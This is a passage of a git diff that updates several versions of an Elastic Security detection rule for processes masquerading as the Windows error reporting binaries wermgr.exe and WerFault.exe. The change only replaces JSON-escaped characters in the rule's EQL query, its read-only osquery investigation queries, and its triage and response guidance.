masquerading as `wermgr.exe` or `WerFault.exe`, by looking for a process creation with no arguments followed by a network connection.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - $osquery_0\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - $osquery_1\n - $osquery_2\n - $osquery_3\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "note": "## Triage and analysis\n\n### Investigating Potential Windows Error Manager Masquerading\n\nBy examining the specific traits of Windows binaries -- such as process trees, command lines, network connections, registry modifications, and so on -- it's possible to establish a baseline of normal activity. Deviations from this baseline can indicate malicious activity, such as masquerading and deserve further investigation.\n\nThis rule identifies a potential malicious process masquerading as `wermgr.exe` or `WerFault.exe`, by looking for a process creation with no arguments followed by a network connection.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - $osquery_0\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - $osquery_1\n - $osquery_2\n - $osquery_3\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", "query": "sequence by host.id, process.entity_id with maxspan = 5s\n [process where host.os.type == \"windows\" and event.type:\"start\" and process.name : (\"wermgr.exe\", \"WerFault.exe\") and process.args_count == 1]\n [network where host.os.type == \"windows\" and process.name : (\"wermgr.exe\", \"WerFault.exe\") and network.protocol != \"dns\" and\n network.direction : (\"outgoing\", \"egress\") and destination.ip !=\"::1\" and destination.ip !=\"127.0.0.1\"\n ]\n", "references": [ "https://twitter.com/SBousseaden/status/1235533224337641473", @@ -93,7 +93,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/6ea41894-66c3-4df7-ad6b-2c5074eb3df8_103.json b/packages/security_detection_engine/kibana/security_rule/6ea41894-66c3-4df7-ad6b-2c5074eb3df8_103.json index c10e962938e..0e26d53102c 100644 --- a/packages/security_detection_engine/kibana/security_rule/6ea41894-66c3-4df7-ad6b-2c5074eb3df8_103.json +++ b/packages/security_detection_engine/kibana/security_rule/6ea41894-66c3-4df7-ad6b-2c5074eb3df8_103.json @@ -16,7 +16,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Potential Windows Error Manager Masquerading", - "note": "## Triage and analysis\n\n### Investigating Potential Windows Error Manager Masquerading\n\nBy examining the specific traits of Windows binaries -- such as process trees, command lines, network connections, registry modifications, and so on -- it's possible to establish a baseline of normal activity. Deviations from this baseline can indicate malicious activity, such as masquerading and deserve further investigation.\n\nThis rule identifies a potential malicious process masquerading as `wermgr.exe` or `WerFault.exe`, by looking for a process creation with no arguments followed by a network connection.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "note": "## Triage and analysis\n\n### Investigating Potential Windows Error Manager Masquerading\n\nBy examining the specific traits of Windows binaries -- such as process trees, command lines, network connections, registry modifications, and so on -- it's possible to establish a baseline of normal activity. Deviations from this baseline can indicate malicious activity, such as masquerading and deserve further investigation.\n\nThis rule identifies a potential malicious process masquerading as `wermgr.exe` or `WerFault.exe`, by looking for a process creation with no arguments followed by a network connection.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", "query": "sequence by host.id, process.entity_id with maxspan = 5s\n [process where host.os.type == \"windows\" and event.type:\"start\" and process.name : (\"wermgr.exe\", \"WerFault.exe\") and process.args_count == 1]\n [network where host.os.type == \"windows\" and process.name : (\"wermgr.exe\", \"WerFault.exe\") and network.protocol != \"dns\" and\n network.direction : (\"outgoing\", \"egress\") and destination.ip !=\"::1\" and destination.ip !=\"127.0.0.1\"\n ]\n", "references": [ "https://twitter.com/SBousseaden/status/1235533224337641473", @@ -93,7 +93,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/6ea41894-66c3-4df7-ad6b-2c5074eb3df8_104.json b/packages/security_detection_engine/kibana/security_rule/6ea41894-66c3-4df7-ad6b-2c5074eb3df8_104.json index 18b33d974d5..f686cfef79f 100644 --- a/packages/security_detection_engine/kibana/security_rule/6ea41894-66c3-4df7-ad6b-2c5074eb3df8_104.json +++ b/packages/security_detection_engine/kibana/security_rule/6ea41894-66c3-4df7-ad6b-2c5074eb3df8_104.json @@ -16,7 +16,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Potential Windows Error Manager Masquerading", - "note": "## Triage and analysis\n\n### Investigating Potential Windows Error Manager Masquerading\n\nBy examining the specific traits of Windows binaries -- such as process trees, command lines, network connections, registry modifications, and so on -- it's possible to establish a baseline of normal activity. Deviations from this baseline can indicate malicious activity, such as masquerading and deserve further investigation.\n\nThis rule identifies a potential malicious process masquerading as `wermgr.exe` or `WerFault.exe`, by looking for a process creation with no arguments followed by a network connection.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "note": "## Triage and analysis\n\n### Investigating Potential Windows Error Manager Masquerading\n\nBy examining the specific traits of Windows binaries -- such as process trees, command lines, network connections, registry modifications, and so on -- it's possible to establish a baseline of normal activity. Deviations from this baseline can indicate malicious activity, such as masquerading and deserve further investigation.\n\nThis rule identifies a potential malicious process masquerading as `wermgr.exe` or `WerFault.exe`, by looking for a process creation with no arguments followed by a network connection.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", "query": "sequence by host.id, process.entity_id with maxspan = 5s\n [process where host.os.type == \"windows\" and event.type:\"start\" and process.name : (\"wermgr.exe\", \"WerFault.exe\") and process.args_count == 1]\n [network where host.os.type == \"windows\" and process.name : (\"wermgr.exe\", \"WerFault.exe\") and network.protocol != \"dns\" and\n network.direction : (\"outgoing\", \"egress\") and destination.ip !=\"::1\" and destination.ip !=\"127.0.0.1\"\n ]\n", "references": [ "https://twitter.com/SBousseaden/status/1235533224337641473", @@ -92,7 +92,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/6ea41894-66c3-4df7-ad6b-2c5074eb3df8_105.json b/packages/security_detection_engine/kibana/security_rule/6ea41894-66c3-4df7-ad6b-2c5074eb3df8_105.json index d5255db7ab4..aea5349cb5c 100644 --- a/packages/security_detection_engine/kibana/security_rule/6ea41894-66c3-4df7-ad6b-2c5074eb3df8_105.json +++ b/packages/security_detection_engine/kibana/security_rule/6ea41894-66c3-4df7-ad6b-2c5074eb3df8_105.json @@ -16,7 +16,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Potential Windows Error Manager Masquerading", - "note": "## Triage and analysis\n\n### Investigating Potential Windows Error Manager Masquerading\n\nBy examining the specific traits of Windows binaries -- such as process trees, command lines, network connections, registry modifications, and so on -- it's possible to establish a baseline of normal activity. Deviations from this baseline can indicate malicious activity, such as masquerading and deserve further investigation.\n\nThis rule identifies a potential malicious process masquerading as `wermgr.exe` or `WerFault.exe`, by looking for a process creation with no arguments followed by a network connection.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "note": "## Triage and analysis\n\n### Investigating Potential Windows Error Manager Masquerading\n\nBy examining the specific traits of Windows binaries -- such as process trees, command lines, network connections, registry modifications, and so on -- it's possible to establish a baseline of normal activity. Deviations from this baseline can indicate malicious activity, such as masquerading and deserve further investigation.\n\nThis rule identifies a potential malicious process masquerading as `wermgr.exe` or `WerFault.exe`, by looking for a process creation with no arguments followed by a network connection.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", "query": "sequence by host.id, process.entity_id with maxspan = 5s\n [process where host.os.type == \"windows\" and event.type:\"start\" and process.name : (\"wermgr.exe\", \"WerFault.exe\") and process.args_count == 1]\n [network where host.os.type == \"windows\" and process.name : (\"wermgr.exe\", \"WerFault.exe\") and network.protocol != 